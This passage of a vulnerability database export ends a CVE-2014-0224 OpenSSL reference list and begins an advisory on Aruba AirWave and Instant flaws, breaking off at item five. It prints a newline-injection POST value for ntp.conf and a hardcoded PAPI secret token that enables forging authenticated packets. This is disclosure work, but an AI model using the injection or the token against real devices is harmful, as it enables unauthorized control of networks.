        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685551"
      },
      {
        "trust": 0.3,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096059"
      },
      {
        "trust": 0.3,
        "url": "http://blogs.splunk.com/2014/06/09/splunk-and-the-latest-openssl-vulnerabilities/"
      },
      {
        "trust": 0.3,
        "url": "http://www.marshut.com/ixwnpv/stunnel-5-02-released.html"
      },
      {
        "trust": 0.3,
        "url": "http://blogs.sophos.com/2014/06/16/utm-up2date-9-113-released/"
      },
      {
        "trust": 0.3,
        "url": "http://blogs.sophos.com/2014/06/18/utm-up2date-9-203-released/"
      },
      {
        "trust": 0.3,
        "url": " https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04404764"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04385138"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/100181099"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/101007404"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/100180978"
      },
      {
        "trust": 0.3,
        "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-198-03"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/mar/21"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/mar/9"
      },
      {
        "trust": 0.3,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03d"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03g"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/100181096"
      },
      {
        "trust": 0.3,
        "url": "http://btsc.webapps.blackberry.com/btsc/viewdocument.do;jsessionid=98ec479ee69ccb916d2ea4b09943faf5?nocount=true\u0026externalid=kb36051\u0026sliceid=1\u0026cmd=\u0026forward=nonthreadedkc\u0026command=show\u0026kcid=kb36051\u0026viewe"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678040"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1it02314"
      },
      {
        "trust": 0.3,
        "url": "http://kb.parallels.com/en/121916"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036409"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24032650#5.0.0.15"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24032651"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24034955"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020948"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04401858"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04355095"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04397114"
      },
      {
        "trust": 0.3,
        "url": " https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479505"
      },
      {
        "trust": 0.3,
        "url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04512909"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04343424"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04368264"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04347622"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04345210"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04347711"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349175"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349789"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349897"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04351097"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04363613"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04368546"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04370307"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04378799"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04379485"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04392919"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04398968"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04401666"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04337774"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04451722"
      },
      {
        "trust": 0.3,
        "url": "https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?spf_p.tpst=kbdocdisplay\u0026spf_p.prp_kbdocdisplay=wsrp-navigationalstate%3ddocid%253demr_na-c04406535-1%257cdoclocale%253d%"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04425253"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04595094"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05301946"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04336637"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001840"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/100181215"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678356"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680546"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680511,swg21680439,swg21680673,swg21680546"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg24037729"
      },
      {
        "trust": 0.3,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095940"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678413"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680706,swg21680707,nas8n1020200,swg21680511,swg21680439,swg21680673,swg21680546"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680673,swg21680546"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680707,nas8n1020200,swg21680511,swg21680439,swg21680673,swg21680546"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004830"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676889"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676673"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678660"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676041"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680439,swg21680673,swg21680546"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676128"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677891"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676536"
      },
      {
        "trust": 0.3,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095910"
      },
      {
        "trust": 0.3,
        "url": "https://www.xerox.com/download/security/security-bulletin/33a01-5228bdf5d027e/cert_security_mini-_bulletin_xrx15ao_for_cq8570-cq8870_v1-0.pdf"
      },
      {
        "trust": 0.3,
        "url": "http://www.novell.com/support/kb/doc.php?id=7015158"
      },
      {
        "trust": 0.3,
        "url": "http://securityadvisories.paloaltonetworks.com/home/detail/23?aspxautodetectcookiesupport=1"
      },
      {
        "trust": 0.3,
        "url": "http://www.freebsd.org/security/advisories/freebsd-sa-14:14.openssl.asc"
      },
      {
        "trust": 0.3,
        "url": "https://bto.bluecoat.com/security-advisory/sa80"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/100181079"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/100181566"
      },
      {
        "trust": 0.3,
        "url": "https://library.netapp.com/ecm/ecm_get_file/ecmp1636026"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020200"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676356"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676276"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676786"
      },
      {
        "trust": 0.3,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0625.html"
      },
      {
        "trust": 0.3,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0629.html"
      },
      {
        "trust": 0.3,
        "url": "http://forums.alienvault.com/discussion/3054/security-advisory-alienvault-v4-10-0-addresses-several-vulnerabilities"
      },
      {
        "trust": 0.3,
        "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-345106.htm"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676793"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021009"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676840"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677225"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682398"
      },
      {
        "trust": 0.3,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095738"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020163"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21683336"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678104"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682023"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021064"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682026"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682025"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682024"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677080"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676877"
      },
      {
        "trust": 0.3,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095841"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21690128"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004678"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004824"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004690"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676542"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676543"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004744"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676333"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678289"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004695"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676708"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676505"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03b"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03c"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03f"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020976"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020952"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987"
      },
      {
        "trust": 0.3,
        "url": "http://googlechromereleases.blogspot.com/2014/06/stable-channel-update-for-chrome-os.html"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001842"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001839"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004821"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004670"
      },
      {
        "trust": 0.3,
        "url": "www-01.ibm.com/support/docview.wss?uid=ssg1s1004671"
      },
      {
        "trust": 0.3,
        "url": "http://www.ubuntu.com/usn/usn-2232-4/"
      },
      {
        "trust": 0.3,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "http://winscp.net/eng/docs/history#5.5.4"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0221"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3470"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0198"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5298"
      },
      {
        "trust": 0.1,
        "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00073"
      },
      {
        "trust": 0.1,
        "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00074"
      },
      {
        "trust": 0.1,
        "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00070"
      },
      {
        "trust": 0.1,
        "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00076"
      },
      {
        "trust": 0.1,
        "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00079"
      },
      {
        "trust": 0.1,
        "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00071"
      },
      {
        "trust": 0.1,
        "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00075"
      },
      {
        "trust": 0.1,
        "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00078"
      },
      {
        "trust": 0.1,
        "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00072"
      },
      {
        "trust": 0.1,
        "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00077"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2232-3"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2232-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1e-3ubuntu1.6"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/bugs/1332643"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.4"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.16"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.19"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3470"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-5298"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0221"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0198"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0224"
      },
      {
        "trust": 0.1,
        "url": "http://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0195"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "http://support.openview.hp.com/selfsolve/document/km01028458"
      },
      {
        "trust": 0.1,
        "url": "http://support.openview.hp.com/selfsolve/document/km01020441"
      },
      {
        "trust": 0.1,
        "url": "http://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=c03536"
      },
      {
        "trust": 0.1,
        "url": "https://www.hp.com"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "67899"
      },
      {
        "db": "PACKETSTORM",
        "id": "127936"
      },
      {
        "db": "PACKETSTORM",
        "id": "127166"
      },
      {
        "db": "PACKETSTORM",
        "id": "127630"
      },
      {
        "db": "PACKETSTORM",
        "id": "127422"
      },
      {
        "db": "PACKETSTORM",
        "id": "127403"
      },
      {
        "db": "PACKETSTORM",
        "id": "127190"
      },
      {
        "db": "PACKETSTORM",
        "id": "128345"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-080"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0224"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2014-0224"
      },
      {
        "db": "BID",
        "id": "67899"
      },
      {
        "db": "PACKETSTORM",
        "id": "127936"
      },
      {
        "db": "PACKETSTORM",
        "id": "127166"
      },
      {
        "db": "PACKETSTORM",
        "id": "127630"
      },
      {
        "db": "PACKETSTORM",
        "id": "127422"
      },
      {
        "db": "PACKETSTORM",
        "id": "127403"
      },
      {
        "db": "PACKETSTORM",
        "id": "127190"
      },
      {
        "db": "PACKETSTORM",
        "id": "128345"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-080"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0224"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-06-05T00:00:00",
        "db": "VULMON",
        "id": "CVE-2014-0224"
      },
      {
        "date": "2014-06-05T00:00:00",
        "db": "BID",
        "id": "67899"
      },
      {
        "date": "2014-08-20T15:18:26",
        "db": "PACKETSTORM",
        "id": "127936"
      },
      {
        "date": "2014-06-24T00:52:51",
        "db": "PACKETSTORM",
        "id": "127166"
      },
      {
        "date": "2014-07-28T20:36:25",
        "db": "PACKETSTORM",
        "id": "127630"
      },
      {
        "date": "2014-07-11T21:05:34",
        "db": "PACKETSTORM",
        "id": "127422"
      },
      {
        "date": "2014-07-09T17:11:19",
        "db": "PACKETSTORM",
        "id": "127403"
      },
      {
        "date": "2014-06-24T01:45:14",
        "db": "PACKETSTORM",
        "id": "127190"
      },
      {
        "date": "2014-09-22T16:56:00",
        "db": "PACKETSTORM",
        "id": "128345"
      },
      {
        "date": "2014-06-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201406-080"
      },
      {
        "date": "2014-06-05T21:55:07.817000",
        "db": "NVD",
        "id": "CVE-2014-0224"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2014-0224"
      },
      {
        "date": "2017-10-19T03:03:00",
        "db": "BID",
        "id": "67899"
      },
      {
        "date": "2022-02-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201406-080"
      },
      {
        "date": "2023-11-07T02:18:13.190000",
        "db": "NVD",
        "id": "CVE-2014-0224"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "127630"
      },
      {
        "db": "PACKETSTORM",
        "id": "127403"
      },
      {
        "db": "PACKETSTORM",
        "id": "128345"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-080"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OpenSSL Encryption problem vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-080"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "encryption problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-080"
      }
    ],
    "trust": 0.6
  }
}

var-202001-1251
Vulnerability from variot

Multiple vulnerabilities exists in Aruba Instate before 4.1.3.0 and 4.2.3.1 due to insufficient validation of user-supplied input and insufficient checking of parameters, which could allow a malicious user to bypass security restrictions, obtain sensitive information, perform unauthorized actions and execute arbitrary code. Aruba Instant There is an input verification vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Multiple Arubanetworks Products are prone to multiple security vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. Following products and versions are affected: ArubaOS (all versions) are vulnerable. AirWave Management Platform 8.x prior to 8.2 are vulnerable. Aruba Instant (all versions up to, but not including, 4.1.3.0 and 4.2.3.1) are vulnerable. The Vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive. Several of the high severity vulnerabilities listed in this report are related to the Aruba proprietary PAPI protocol and allow remote compromise of affected devices. AMP: RabbitMQ Management interface exposed 2. AMP: XSRF token uses weak calculation algorithm 3. AMP: Arbitrary modification of /etc/ntp.conf 4. AMP: PAPI uses static key for calculating validation checksum (auth bypass) 5. (I)AP: Insecure transmission of login credentials (GET) 6. (I)AP: Built in privileged "support" account 7. (I)AP: Static password hash for support account 8. (I)AP: Unusual account identified ("arubasecretadmin") 9. (I)AP: Privileged remote code execution 10. (I)AP: Radius passwords allow arbitrary raddb commands 11. (I)AP: Unauthenticated disclosure of environment variables 12. (I)AP: Information disclosure by firmware checking functionality 13. (I)AP: Unauthenticated automated firmware update requests 14. (I)AP: Firmware updater does not check certificates 15. (I)AP: Forceful downgrade of FW versions possible 16. (I)AP: Firmware update check discloses machine certificate 17. (I)AP: Firmware is downloaded via unencrypted connection 18. (I)AP: Firmware update Challenge/Response does not protect the Client 19. (I)AP: Unencrypted private keys and certs 20. (I)AP: Potential signature private key 21. (I)AP: PAPI Endpoints exposed to all interfaces 22. (I)AP: PAPI Endpoint does not validate MD5 signatures 23. (I)AP: PAPI protocol encrypted with weak encryption algorithm 24. (I)AP: PAPI protocol authentication bypass 25. (I)AP: Broadcast with detailed system information (LLDP) 26. (I)AP: User passwords are encrypted with a static key

Vulnerability Details

1. AMP: RabbitMQ Management interface exposed

AMPs expose the management frontend for the RabbitMQ message queue on all interfaces via tcp/15672 and tcp/55672.

# netstat -nltp | grep beam tcp 0 0 127.0.0.1:5672 0.0.0.0: LISTEN 2830/beam.smp tcp 0 0 127.0.0.1:17716 0.0.0.0: LISTEN 2830/beam.smp tcp 0 0 0.0.0.0:15672 0.0.0.0: LISTEN 2830/beam.smp tcp 0 0 0.0.0.0:55672 0.0.0.0: LISTEN 2830/beam.smp

The password for the default user "airwave" is stored in the world readable file /etc/rabbitmq/rabbitmq.config in plaintext:

# ls -l /etc/rabbitmq/rabbitmq.config -rw-r--r-- 1 root root 275 Oct 28 15:48 /etc/rabbitmq/rabbitmq.config # grep default_ /etc/rabbitmq/rabbitmq.config {default_user,<<"airwave">>}, {default_pass,<<"REMOVED">>}

2. AMP: XSRF token uses weak calculation algorithm

The XSRF token is calculated based on limited sources of entropy, consisting of the user's time of login and a random number between 0 and 99999. The algorithm Is approximated by the following example Python script:

base64.b64encode(hashlib.md5('%d%5.5d' % (int(time.time()), random.randint(0,99999))).digest())

3. AMP: Arbitrary modification of /etc/ntp.conf

Incorrect/missing filtering of input parameters allows injecting new lines and arbitrary commands into /etc/ntp.conf, when updating the NTP settings via the web frontend.

POST /nf/pref_network? HTTP/1.1 Host: 192.168.131.162 [...]

id=&ip_1=192.168.131.162&hostname_1=foo.example.com& subnet_mask_1=255.255.255.248&gateway_1=192.168.131.161&dns1_1=172.16.255.1& dns2_1=&eth1_enabled_1=0&eth1_ip_1=&eth1_netmask_1=& ntp1_1=time1.example.com%0afoo&ntp2_1=time2.example.com&save=Save

The above POST requests results in the following ntp.conf being generated:

# cat /etc/ntp.conf [...] server time1.example.com foo server time2.example.com

4. AMP: PAPI uses static key for calculating validation checksum (auth bypass)

PAPI packets sent from an AP to an AMP are authenticated with a cryptographic checksum. The packet format is only partially known, as it's a proprietary format created by Aruba. A typical PAPI packet sent to an AMP is as follows:

0000 49 72 00 02 64 69 86 2d 7f 00 00 01 01 00 01 00 Ir..di.-........ 0010 20 1f 20 1e 00 01 00 00 00 01 3e f9 22 49 05 b3 . .......>."I.. 0020 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 P.@.]...F...

The following dissection of the above shown packet gives a more detailed overview of the format:

49 72 ID 00 02 Version 64 69 86 2d PAPI Destination IP 7f 00 00 01 PAPI Source IP 01 00 Unknown1 01 00 Unknown2 20 1f PAPI Source Port 20 1e PAPI Destination Port 00 01 Unknown3 00 00 Unknown4 00 01 Sequence Number 3e f9 Unknown5 22 49 05 b3 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 Checksum

The checksum is based on a MD5 hash of a padded concatenation of all fields and a secret token. The secret token is hardcoded in multiple binaries on the AMP and can easily be retrieved via core Linux system tools:

$ strings /opt/airwave/bin/msgHandler | grep asd asdf;lkj763

Using this secret token it is possible to craft valid PAPI packets and issue commands to the AMP, bypassing the authentication based on the shared secret / token. This can be exploited to compromise of the device. Random sampling of different software versions available on Aruba's website confirmed that the shared secret is identical for all versions.

5. AP: Insecure transmission of login credentials (GET)

